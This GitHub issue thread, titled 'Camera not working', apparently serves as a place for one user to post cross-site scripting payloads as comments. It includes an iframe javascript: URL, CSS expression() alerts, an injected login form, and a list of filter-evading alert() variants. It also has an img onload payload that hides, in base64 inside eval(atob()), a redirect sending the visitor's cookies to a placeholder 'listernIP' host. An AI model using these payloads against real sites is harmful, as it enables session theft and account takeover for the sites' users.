### ISSUE TITLE
Camera not working

### ISSUE THREAD

**Issue by gdeepak884** [gdeepak884/iexam#2]
Recheck camera API workflow

**Comment by gdeepak884** [comment]
[a](.alert(12);)

**Comment by gdeepak884** [comment]
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

**Comment by gdeepak884** [comment]
<DIV STYLE="width: expression(alert('XSS'));">

**Comment by gdeepak884** [comment]
<DIV STYLE="width: expression(alert('XSS'));">H</div>

**Comment by gdeepak884** [comment]
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<nav>
    <ul class="ext-nav">
        <li id="login">
            <a  href="#" margin-right="40px">login</a>
                <form id="login-form" action="script/login.php" method="post">
                    <p><input class="text" type="text" name="username" placeholder="username" /></p>
                    <p><input class="text" type="password" name="password" placeholder="password" /></p>
                    <p><input class="submit" type="submit" value="submit" /></p>
                </form>
        </li>
    </ul>
</nav>
<style>
#login {
    list-style: none;
	height: 40px;
}

#login a {
    text-decoration: none;
    color: white;
    background-color: #666;
    border-radius: 5px;
    -moz-border-radius: 5px;
    -webkit-border-radius: 5px;
    padding: 10px 20px;
}

#login-form  {
    position: absolute;
    margin-top: 9px;
    display: none;
    float: left;
    clear: both;
    background-color: #666;
    padding: 0 2% 2% 2%;
    border-radius: 5px;
    -moz-border-radius: 5px;
    -webkit-border-radius: 5px;
}

#login-form .text {
    width: 100%;
    float: right;
    margin-bottom: 2%;
}

#login-form .submit {
    float: right;
}
</style>

**Comment by gdeepak884** [comment]
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<nav>
    <ul class="ext-nav">
        <li id="login">
            <a  href="#" margin-right="40px">login</a>
                <form id="login-form" action="script/login.php" method="post">
                    <p><input class="text" type="text" name="username" placeholder="username" /></p>
                    <p><input class="text" type="password" name="password" placeholder="password" /></p>
                    <p><input class="submit" type="submit" value="submit" /></p>
                </form>
        </li>
    </ul>
</nav>
<script language="js">
$("#login").hover(function() {
	$("#login-form").slideToggle();
});
<script>

**Comment by gdeepak884** [comment]
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">

**Comment by gdeepak884** [comment]
(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)

**Comment by gdeepak884** [comment]
(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
